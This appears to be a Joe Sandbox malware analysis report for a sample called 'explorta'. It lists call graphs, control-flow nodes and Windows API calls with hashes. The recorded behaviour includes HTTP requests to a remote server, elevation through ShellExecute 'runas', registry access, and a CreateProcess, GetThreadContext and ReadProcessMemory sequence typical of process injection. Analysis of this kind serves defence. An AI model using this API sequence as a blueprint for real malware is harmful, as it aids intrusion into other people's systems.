14717->14721 14723 5acbc7 RtlAllocateHeap 14717->14723 14718->14715 14720 5a7554 14718->14720 14724 5a755a 14719->14724 14722 5acbc7 RtlAllocateHeap 14720->14722 14721->14694 14722->14724 14725 5a7586 14723->14725 14724->14694 14725->14694 14727 5a6991 14726->14727 14728 5acbc7 RtlAllocateHeap 14727->14728 14729 5a69b8 14728->14729 14730 5a6bc6 
__ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 14729->14730 14731 5acbc7 RtlAllocateHeap 14729->14731 14730->14705 14732 5a6b3b __cftof __Mtx_init_in_situ 14731->14732 14740 592dc0 14732->14740 14735 593e1e 14734->14735 14737 593e48 14734->14737 14735->14713 14736 593e58 14736->14713 14737->14736 14785 592b00 14737->14785 14741 592e6f 14740->14741 14742 592e06 14740->14742 14748 592eef 14741->14748 14753 5abe8c GetSystemTimePreciseAsFileTime 14741->14753 14743 5abe8c GetSystemTimePreciseAsFileTime 14742->14743 14744 592e12 14743->14744 14745 592e1d 14744->14745 14746 592f1e 14744->14746 14750 5acbc7 RtlAllocateHeap 14745->14750 14752 592e30 __Mtx_unlock 14745->14752 14747 5aba4a 13 API calls 14746->14747 14749 592f24 14747->14749 14748->14730 14751 5aba4a 13 API calls 14749->14751 14750->14752 14754 592eb9 14751->14754 14752->14741 14752->14749 14753->14754 14755 5aba4a 13 API calls 14754->14755 14756 592ec0 __Mtx_unlock 14754->14756 14755->14756 14757 5aba4a 13 API calls 14756->14757 14758 592ed8 __Cnd_broadcast 14756->14758 14757->14758 14758->14748 14759 5aba4a 13 API calls 14758->14759 14760 592f3c 14759->14760 14761 5abe8c GetSystemTimePreciseAsFileTime 14760->14761 14771 592f80 shared_ptr __Mtx_unlock 14761->14771 14762 5930c5 14763 5aba4a 13 API calls 14762->14763 14764 5930cb 14763->14764 14765 5aba4a 13 API calls 14764->14765 14766 5930d1 14765->14766 14767 5aba4a 13 API calls 14766->14767 14773 593093 __Mtx_unlock 14767->14773 14768 5930a7 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 14768->14730 14769 5aba4a 13 API calls 14770 5930dd 14769->14770 14771->14762 14771->14764 14771->14768 14772 5abe8c GetSystemTimePreciseAsFileTime 14771->14772 14774 59305f 14772->14774 14773->14768 14773->14769 14774->14762 14774->14766 14774->14773 14776 5ab52c 
14774->14776 14779 5ab352 14776->14779 14778 5ab53c 14778->14774 14780 5ab37c 14779->14780 14781 5ac74b _xtime_get GetSystemTimePreciseAsFileTime 14780->14781 14784 5ab384 __Xtime_diff_to_millis2 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 14780->14784 14782 5ab3af __Xtime_diff_to_millis2 14781->14782 14783 5ac74b _xtime_get GetSystemTimePreciseAsFileTime 14782->14783 14782->14784 14783->14784 14784->14778 14786 5acbc7 RtlAllocateHeap 14785->14786 14787 592b0e 14786->14787 14795 5ab027 14787->14795 14789 592b42 14790 592b49 14789->14790 14801 592b80 14789->14801 14790->14713 14792 592b58 14804 592460 14792->14804 14794 592b65 std::_Throw_future_error 14796 5ab034 14795->14796 14800 5ab053 Concurrency::details::_Reschedule_chore 14795->14800 14807 5ac357 14796->14807 14798 5ab044 14798->14800 14809 5aaffe 14798->14809 14800->14789 14815 5aafdb 14801->14815 14803 592bb2 shared_ptr 14803->14792 14805 5c308c ___std_exception_copy RtlAllocateHeap 14804->14805 14806 592497 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 14805->14806 14806->14794 14808 5ac372 CreateThreadpoolWork 14807->14808 14808->14798 14810 5ab007 Concurrency::details::_Reschedule_chore 14809->14810 14813 5ac5ac 14810->14813 14812 5ab021 14812->14800 14814 5ac5c1 TpPostWork 14813->14814 14814->14812 14816 5aaff7 14815->14816 14817 5aafe7 14815->14817 14816->14803 14817->14816 14819 5ac258 14817->14819 14820 5ac26d TpReleaseWork 14819->14820 14820->14816 14822 5921e0 std::invalid_argument::invalid_argument RtlAllocateHeap 14821->14822 14823 5ab57f 14822->14823 14823->14624 13492 5c6224 13493 5c623c 13492->13493 13494 5c6232 13492->13494 13495 5c616d 5 API calls 13493->13495 13496 5c6256 13495->13496 13497 5c60cd RtlAllocateHeap 13496->13497 13498 5c6263 ___free_lconv_mon 13497->13498 13249 
596020 RegOpenKeyExA 13250 59605d RegSetValueExA 13249->13250 13251 596087 shared_ptr __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 13249->13251 13250->13251 13514 59d8e0 recv 13515 59d942 recv 13514->13515 13516 59d977 recv 13515->13516 13518 59d9b1 13516->13518 13517 59dad3 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 13518->13517 13523 5abe8c 13518->13523 13530 5abc32 13523->13530 13525 59db0e 13526 5aba4a 13525->13526 13527 5aba72 13526->13527 13528 5aba54 13526->13528 13527->13527 13528->13527 13547 5aba77 13528->13547 13531 5abc88 13530->13531 13533 5abc5a __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 13530->13533 13531->13533 13536 5ac74b 13531->13536 13533->13525 13534 5abcdd __Xtime_diff_to_millis2 13534->13533 13535 5ac74b _xtime_get GetSystemTimePreciseAsFileTime 13534->13535 13535->13534 13537 5ac75a 13536->13537 13539 5ac767 __aulldvrm 13536->13539 13537->13539 13540 5ac724 13537->13540 13539->13534 13543 5ac3ca 13540->13543 13544 5ac3db GetSystemTimePreciseAsFileTime 13543->13544 13545 5ac3e7 13543->13545 13544->13545 13545->13539 13552 5929e0 13547->13552 13549 5aba8e 13568 5ab9df 13549->13568 13551 5aba9f std::_Throw_future_error 13551->13528 13574 5ab6bf 13552->13574 13554 5929ff 13554->13549 13555 5929f4 __cftof 13555->13554 13556 5c835f __cftof 4 API calls 13555->13556 13557 5c64d6 13556->13557 13558 5c64e5 13557->13558 13559 5c64f3 13557->13559 13560 5c6549 12 API calls 13558->13560 13561 5c616d 5 API calls 13559->13561 13562 5c64ef 13560->13562 13563 5c650d 13561->13563 13562->13549 13564 5c60cd RtlAllocateHeap 13563->13564 13565 5c651a 13564->13565 13566 5c6549 12 API calls 13565->13566 13567 5c6521 ___free_lconv_mon 13565->13567 
13566->13567 13567->13549 13569 5ab9eb __EH_prolog3_GS 13568->13569 13570 5a78a0 RtlAllocateHeap 13569->13570 13571 5aba1d 13570->13571 13581 5925b0 13571->13581 13573 5aba32 13573->13551 13577 5ac411 13574->13577 13578 5ac41f InitOnceExecuteOnce 13577->13578 13580 5ab6d2 13577->13580 13578->13580 13580->13555 13582 5a71e0 RtlAllocateHeap 13581->13582 13583 592602 13582->13583 13584 592625 13583->13584 13585 5a8720 RtlAllocateHeap 13583->13585 13586 5a8720 RtlAllocateHeap 13584->13586 13588 59268e shared_ptr 13584->13588 13585->13584 13586->13588 13587 5c308c ___std_exception_copy RtlAllocateHeap 13589 59274b shared_ptr __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ ___std_exception_destroy 13587->13589 13588->13587 13588->13589 13589->13573 13902 59dd20 13903 59dd45 13902->13903 13905 59dd29 13902->13905 13905->13903 13906 59db80 13905->13906 13907 59db90 __dosmaperr 13906->13907 13914 5c8229 13907->13914 13915 5c8244 13914->13915 13921 5c7f87 13915->13921 13917 59dbcd 13918 5ab979 13917->13918 13943 5ab8c9 13918->13943 13920 5ab98a std::_Throw_future_error 13922 5c7f99 13921->13922 13923 5c60ea __cftof 5 API calls 13922->13923 13926 5c7fae __dosmaperr ___std_exception_copy 13922->13926 13925 5c7fde 13923->13925 13925->13926 13927 5c81d5 13925->13927 13926->13917 13928 5c8212 13927->13928 13931 5c81e2 13927->13931 13929 5ccb99 4 API calls 13928->13929 13930 5c81f1 __fassign 13929->13930 13930->13925 13931->13930 13933 5ccbbd 13931->13933 13934 5c60ea __cftof 5 API calls 13933->13934 13936 5ccbda 13934->13936 13935 5ccbea __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 13935->13930 13936->13935 13938 5ce930 13936->13938 13939 5c60ea __cftof 5 API calls 13938->13939 13940 5ce950 __fassign 13939->13940 13941 5ce9a3 __cftof __fassign __freea 
__ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 13940->13941 13942 5ca7bb __cftof RtlAllocateHeap 13940->13942 13941->13935 13942->13941 13944 5921e0 std::invalid_argument::invalid_argument RtlAllocateHeap 13943->13944 13945 5ab8db 13944->13945 13945->13920 14584 59a9e0 14585 59aa32 14584->14585 14586 5a78a0 RtlAllocateHeap 14585->14586 14587 59aa73 14586->14587 14588 5a7cf0 RtlAllocateHeap 14587->14588 14589 59aab5 14588->14589 14590 5a7cf0 RtlAllocateHeap 14589->14590 14591 59aaf6 14590->14591 14592 5a71e0 RtlAllocateHeap 14591->14592 14593 59ab1d 14592->14593 14594 5a7cf0 RtlAllocateHeap 14593->14594 14595 59ab5f 14594->14595 14596 5a7cf0 RtlAllocateHeap 14595->14596 14597 59aba6 14596->14597 14598 5a7cf0 RtlAllocateHeap 14597->14598 14599 59abed 14598->14599 14828 5a7ba0 14829 5a6f40 RtlAllocateHeap 14828->14829 14830 5a7c19 14829->14830 14831 5a8720 RtlAllocateHeap 14830->14831 14832 5a7c34 14830->14832 14831->14832 14833 5a8720 RtlAllocateHeap 14832->14833 14834 5a7c88 14832->14834 14835 5a7cce 14833->14835

Control-flow Graph
APIs
• InternetOpenW.WININET(005E8D34,00000000,00000000,00000000,00000000), ref: 0059B6FD
• InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 0059B721
• HttpOpenRequestA.WININET(?,00000000), ref: 0059B76A
• HttpSendRequestA.WININET(?,00000000), ref: 0059B82B
• InternetReadFile.WININET(?,?,000003FF,?), ref: 0059B8DC
• InternetCloseHandle.WININET(?), ref: 0059B9B7
• InternetCloseHandle.WININET(?), ref: 0059B9BF
• InternetCloseHandle.WININET(?), ref: 0059B9C7
Strings
Memory Dump Source
• Source File: 00000002.00000002.3250378397.0000000000591000.00000040.00000001.01000000.00000007.sdmp, Offset: 00590000, based on PE: true
• Associated: 00000002.00000002.3250324411.0000000000590000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250378397.00000000005F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250721245.00000000005F7000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250812316.00000000005F9000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250812316.0000000000791000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250812316.0000000000868000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250812316.0000000000895000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250812316.000000000089F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250812316.00000000008AD000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3252240373.00000000008AE000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3252661113.0000000000A4D000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3252828926.0000000000A4F000.00000080.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_590000_explorta.jbxd
Yara matches
Similarity
• API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSend
• String ID: WA9QQy==$WiVq$cDRX8BqpMw==$cDRX8FO0MyY=$invalid stoi argument$stoi argument out of range$3_
• API String ID: 688256393-2154739448
• Opcode ID: a3a52a4a38f206cdaf49bcb1792af6e034f650a7aa6c0f190c7b67003a6ae139
• Instruction ID: 272506125af6c1b7d487c11d218c5c7242aabba59c0f67b98a2751642de32a94
• Opcode Fuzzy Hash: a3a52a4a38f206cdaf49bcb1792af6e034f650a7aa6c0f190c7b67003a6ae139
• Instruction Fuzzy Hash: B4B1B0B1A101189BFF25CF28CD89BADBFA9FB85304F5041A8E508972D2D7759AC0CB95
Uniqueness

Uniqueness Score: -1.00%

APIs
• ShellExecuteA.SHELL32(00000000,0059704D,?,?,00000000,00000000), ref: 00596EC4
• Sleep.KERNELBASE(00000064,031683DB,?,00000000,005D9148,000000FF), ref: 0059714C
• CreateThread.KERNELBASE(00000000,00000000,00596FB0,005F6530,00000000,00000000,?,?,?,?,?,?,?,?), ref: 0059723E
• Sleep.KERNELBASE(000001F4,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00597249
  • Part of subcall function 005AC8AC: RtlWakeAllConditionVariable.NTDLL ref: 005AC960
Strings
Memory Dump Source
• Source File: 00000002.00000002.3250378397.0000000000591000.00000040.00000001.01000000.00000007.sdmp, Offset: 00590000, based on PE: true
• Associated: 00000002.00000002.3250324411.0000000000590000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250378397.00000000005F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250721245.00000000005F7000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250812316.00000000005F9000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250812316.0000000000791000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250812316.0000000000868000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250812316.0000000000895000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250812316.000000000089F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250812316.00000000008AD000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3252240373.00000000008AE000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3252661113.0000000000A4D000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3252828926.0000000000A4F000.00000080.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_590000_explorta.jbxd
Yara matches
Similarity
• API ID: Sleep$ConditionCreateExecuteShellThreadVariableWake
• String ID: 0e_$He_$`e_$runas
• API String ID: 2515422543-3804989215
• Opcode ID: 29561497a8ef3d85b4a56c669c214e3071550b239430facf097ea20f40210829
• Instruction ID: 7236587944737f48256cce76d1b4c8e0b1436c261d3ebed74a5b925db96b5086
• Opcode Fuzzy Hash: 29561497a8ef3d85b4a56c669c214e3071550b239430facf097ea20f40210829
• Instruction Fuzzy Hash: 8C124771610149AFEF08DF28CD89BAD7FA6FB89300F508259F815973C6D7399A84CB91
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ___std_exception_copy.LIBVCRUNTIME ref: 005923BE
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3250378397.0000000000591000.00000040.00000001.01000000.00000007.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250324411.0000000000590000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250378397.00000000005F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250721245.00000000005F7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.00000000005F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000791000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000868000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.000000000089F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.00000000008AD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252240373.00000000008AE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252661113.0000000000A4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252828926.0000000000A4F000.00000080.00000001.01000000.00000007.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_590000_explorta.jbxd
Yara matches
Similarity
• API ID: ___std_exception_copy
• String ID:
• API String ID: 2659868963-0
Uniqueness
Uniqueness Score: -1.00%
Strings
Memory Dump Source
• Source File: 00000002.00000002.3250378397.0000000000591000.00000040.00000001.01000000.00000007.sdmp, Offset: 00590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_590000_explorta.jbxd
Yara matches
Similarity
• API ID: InternetOpen$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequest
• String ID: 0TI3$0TY3$0ik3$1C03$246122658369$3c5ff2$Ks==$Py4vHy==$RCM+$RCQ+$cSQ3$dDY3$dYc3$dZM3$eCM3$eYQ3$eZQ68u==$ef0=$fS43$fjM3$stoi argument out of range
• API String ID: 3545240790-3557771482
Uniqueness
Uniqueness Score: -1.00%
Control-flow Graph
APIs
• std::_Xinvalid_argument.LIBCPMT ref: 00596C15
• CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00596CAB
• VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00596CC4
• Wow64GetThreadContext.KERNEL32(?,00000000), ref: 00596CD9
• ReadProcessMemory.KERNELBASE(?, ,?,00000004,00000000), ref: 00596CF9
Strings
Memory Dump Source
• Source File: 00000002.00000002.3250378397.0000000000591000.00000040.00000001.01000000.00000007.sdmp, Offset: 00590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_590000_explorta.jbxd
Yara matches
Similarity
• API ID: Process$AllocContextCreateMemoryReadThreadVirtualWow64Xinvalid_argumentstd::_
• String ID: $VUUU$invalid stoi argument
• API String ID: 3950861772-3954507777
Uniqueness
Uniqueness Score: -1.00%
Control-flow Graph: function at 5978b0 (graph rendering not reproduced)
APIs
• GetNativeSystemInfo.KERNELBASE(?), ref: 00597A53
Strings
Memory Dump Source
• Source File: 00000002.00000002.3250378397.0000000000591000.00000040.00000001.01000000.00000007.sdmp, Offset: 00590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_590000_explorta.jbxd
Yara matches
Similarity
• API ID: InfoNativeSystem
• String ID: OfAuIe==$OfAuJO==$OfAvHe==
• API String ID: 1721193555-782918887
                                                                                                                                                                                                                                          • Opcode ID: 27891a0884f868432ac913f5b2c4b58352d09ed0c1a1a91b10b852c5066c9c66
                                                                                                                                                                                                                                          • Instruction ID: 72f531da9142a573b3685b7bf812d66338583b580f241ae5f3d4e96085dac63c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 27891a0884f868432ac913f5b2c4b58352d09ed0c1a1a91b10b852c5066c9c66
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9ED1D571E142089BDF15BB28CD4A7AD7E61BB86310F544289E415AB3C2EB754F94CBC2
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 1165 5c66b1-5c66e6 GetFileType 1166 5c66ec-5c66f7 1165->1166 1167 5c679e-5c67a1 1165->1167 1170 5c6719-5c6735 call 5c38d0 GetFileInformationByHandle 1166->1170 1171 5c66f9-5c670a call 5c6a27 1166->1171 1168 5c67ca-5c67f2 1167->1168 1169 5c67a3-5c67a6 1167->1169 1174 5c680f-5c6811 1168->1174 1175 5c67f4-5c6807 1168->1175 1169->1168 1172 5c67a8-5c67aa 1169->1172 1179 5c67bb-5c67c8 call 5c6cbd 1170->1179 1184 5c673b-5c677d call 5c6979 call 5c6821 * 3 1170->1184 1186 5c67b7-5c67b9 1171->1186 1187 5c6710-5c6717 1171->1187 1178 5c67ac-5c67b1 call 5c6cf3 1172->1178 1172->1179 1177 5c6812-5c6820 call 5ac7d1 1174->1177 1175->1174 1192 5c6809-5c680c 1175->1192 1178->1186 1179->1186 1201 5c6782-5c679a call 5c6946 1184->1201 1186->1177 1187->1170 1192->1174 1201->1174 1204 5c679c 1201->1204 1204->1186
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetFileType.KERNELBASE(?,?,00000000,00000000), ref: 005C66D3
                                                                                                                                                                                                                                          • GetFileInformationByHandle.KERNELBASE(?,?), ref: 005C672D
                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 005C67C2
                                                                                                                                                                                                                                            • Part of subcall function 005C6A27: __dosmaperr.LIBCMT ref: 005C6A5C
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3250378397.0000000000591000.00000040.00000001.01000000.00000007.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250324411.0000000000590000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250378397.00000000005F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250721245.00000000005F7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.00000000005F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000791000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000868000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.000000000089F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.00000000008AD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252240373.00000000008AE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252661113.0000000000A4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252828926.0000000000A4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_590000_explorta.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: File__dosmaperr$HandleInformationType
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2531987475-0
                                                                                                                                                                                                                                          • Opcode ID: f8a465f7f79221aa35a6ee80a2a5fe78de8084e1a083431b95e3dc55fe2e00eb
                                                                                                                                                                                                                                          • Instruction ID: af2815e70206944e7a8180b755ee51dc1922b77c724852d3c5adc49bcb59f984
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f8a465f7f79221aa35a6ee80a2a5fe78de8084e1a083431b95e3dc55fe2e00eb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 01415AB5900205AFDB24DFB5D845EAFBBF9FF88304B10482DE856D3211EA309A44CB61
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 1205 595e90-595f15 call 5c38d0 RegOpenKeyExA 1208 595f41-595f64 RegCloseKey 1205->1208 1209 595f17-595f40 RegQueryValueExA 1205->1209 1210 595f67-595f6c 1208->1210 1209->1208 1210->1210 1211 595f6e-595f85 call 5a78a0 1210->1211 1214 595faf-595fc7 1211->1214 1215 595f87-595f93 1211->1215 1218 595fc9-595fd5 1214->1218 1219 595ff1-59600c call 5ac7d1 1214->1219 1216 595fa5-595fac call 5ace48 1215->1216 1217 595f95-595fa3 1215->1217 1216->1214 1217->1216 1220 59600d-596012 call 5c644a 1217->1220 1222 595fe7-595fee call 5ace48 1218->1222 1223 595fd7-595fe5 1218->1223 1222->1219 1223->1220 1223->1222
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNELBASE(80000002,?,00000000,00000001,?), ref: 00595F0D
                                                                                                                                                                                                                                          • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,?), ref: 00595F3B
                                                                                                                                                                                                                                          • RegCloseKey.KERNELBASE(?), ref: 00595F47
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3250378397.0000000000591000.00000040.00000001.01000000.00000007.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250324411.0000000000590000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250378397.00000000005F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250721245.00000000005F7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.00000000005F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000791000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000868000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.000000000089F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.00000000008AD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252240373.00000000008AE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252661113.0000000000A4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252828926.0000000000A4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_590000_explorta.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3677997916-0
                                                                                                                                                                                                                                          • Opcode ID: a10b453680bd78aba0db8d9dfbe6dd46729d65bd4f1ff4b240d4d6208f230eef
                                                                                                                                                                                                                                          • Instruction ID: 5fab4c0ba0995c2d9a2009350f276b45e316cbec88df0788f6fed318f6da4a93
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a10b453680bd78aba0db8d9dfbe6dd46729d65bd4f1ff4b240d4d6208f230eef
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8741F4B16001089FEF29CF28CC49BED7BB9FB45314F1081ADF91597681E7759A84CB94
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
